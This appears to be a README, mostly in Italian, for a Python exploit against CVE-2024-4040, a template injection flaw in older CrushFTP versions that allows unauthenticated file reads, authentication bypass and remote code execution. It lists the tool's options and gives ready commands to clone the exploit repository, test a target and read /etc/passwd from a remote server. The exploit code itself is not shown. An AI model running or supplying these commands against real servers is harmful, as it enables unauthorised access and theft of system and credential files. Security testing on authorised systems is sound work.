
Una vulnerabilità di server side template injection in CrushFTP in tutte le versioni precedenti alla 10.7.1 e 11.1.0 su tutte le piattaforme consente a utenti remoti non autenticati di leggere file dal filesystem al di fuori del VFS Sandbox, bypassare l'autenticazione per ottenere accesso amministrativo ed eseguire codice in remoto sul server.
Exploit Python per CVE-2024-4040
Una vulnerabilità di server side template injection in CrushFTP in tutte le versioni precedenti alla 10.7.1 e 11.1.0 su tutte le piattaforme consente ad attaccanti remoti non autenticati di leggere file dal filesystem al di fuori del VFS Sandbox, bypassare l'autenticazione per ottenere accesso amministrativo ed eseguire codice in remoto sul server.
-h --help Show this screen.
-t --target Specify target URL
-f --file Specify file to include
Only test if vulnerable: exploit.py -t http://10.10.1.23:8080
Include /etc/passwd: exploit.py -t http://10.10.1.23:8080 -f /etc/passwd
git clone https://github.com/1ncendium/CVE-2024-4040.git
cd CVE-2024-4040
python3 exploit.py -t http://target:8080